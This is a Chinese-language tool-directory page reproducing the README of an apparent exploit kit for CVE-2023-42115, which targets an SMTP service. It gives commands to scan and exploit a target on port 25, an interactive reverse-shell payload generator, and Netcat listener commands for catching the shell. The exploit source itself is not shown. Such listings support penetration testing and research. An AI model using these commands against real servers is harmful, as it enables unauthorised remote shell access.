Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2023-42115 — 基于 Python 的 CVE-2023-42115 漏洞利用与反向 Shell Payload 生成器,支持扫描与利用模式,并可实现跨平台 Payload 创建。 | Kitploit
工具/GitHubGitHub/kirinse/cve-2023-42115
Payload生成漏洞分析漏洞利用Shellcode渗透测试Payload 开发
GitHubkirinse/cve-2023-42115

cve-2023-42115

基于 Python 的 CVE-2023-42115 漏洞利用与反向 Shell Payload 生成器,支持扫描与利用模式,并可实现跨平台 Payload 创建。

查看仓库
9482年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-42115:漏洞利用与载荷生成脚本

本仓库包含两个 Python 脚本:

  1. exploit.py:用于利用 CVE-2023-42115 的脚本。
  2. generate_payload.py:用于生成反向 Shell 载荷的脚本。

先决条件

在运行脚本之前,请确保您的系统已安装 Python 3。

安装

  1. 克隆仓库:
    root@kitploit:~
    git clone https://github.com/isotaka134/cve-2023-42115.git
    cd cve-2023-42115
    
    
  2. 安装依赖:

使用 pip 安装所需的 Python 库。运行以下命令来安装 requirements.txt 中列出的所有必要依赖:

root@kitploit:~
pip install -r requirements.txt

使用方法

exploit.py

此脚本用于利用 CVE-2023-42115 漏洞。

root@kitploit:~
python exploit.py -t <target_ip> -p <target_port> [options]

选项:

-t:目标 IP 地址。

-p:目标服务的端口。

示例:

  1. 扫描目标
    root@kitploit:~
    python exploit.py -t 192.168.1.10 -p 25  --mode SCAN
    
  2. 利用漏洞
    root@kitploit:~
    python exploit.py -t 192.168.1.10 -p 25 --mode EXPLOIT -f /path/to/payload.sh
    

generate_payload.py

此脚本根据用户输入生成反向 Shell 载荷。

root@kitploit:~
 python generate_payload.py

步骤:

该脚本会提示您输入以下信息:

A. 载荷类型(linux 或 windows)

B. 本地 IP 地址:用于反向连接

C. 本地端口:用于反向连接 ** I:如果您位于路由器后面或使用 NAT,请确保设置正确的端口转发到运行 Netcat 的设备。**

D. 输出文件名(例如,Linux 下为 payload.sh,Windows 下为 payload.ps1)

示例:

root@kitploit:~
python generate_payload.py
Payload Generator
Enter payload type (linux/windows): Linux 
Enter local IP address: 127.0.0.1
Enter local port: 4444
Enter output file name (e.g., payload.sh or payload.ps1): Payload.sh
Payload saved to Payload.sh

设置监听器

您需要在本地机器上设置一个监听器来接收反向 Shell。可以使用 Netcat (nc) 来实现。

  1. 对于 Linux: 打开终端并启动 Netcat 监听器:
root@kitploit:~
  nc -lvnp <YOUR_LOCAL_PORT>
  1. 对于 Windows: 打开命令提示符并启动 Netcat 监听器:
root@kitploit:~
  nc -lvnp <YOUR_LOCAL_PORT>

按照这些步骤,您应该能够创建并使用载荷来利用 CVE-2023-42115 并接收到反向 Shell 连接。

贡献

如果您有改进建议或希望贡献代码,请提出问题或提交拉取请求。

免责声明

  1. 法律声明:此脚本仅用于教育和道德测试目的。未经授权对您不拥有或未经明确许可的系统进行使用是违法的,并将受到法律制裁。
  2. 道德使用:请负责任地使用此脚本,并且仅在可以进行安全测试的环境中使用。

故障排除

  1. 连接问题:验证目标是否可达以及 SMTP 服务是否运行。
  2. 漏洞检测:确保服务横幅与漏洞检查的预期输出匹配。
  3. 载荷执行:确保载荷文件格式正确且可访问。

联系方式

如有疑问或需要支持,请联系

root@kitploit:~
 [email protected]
下载工具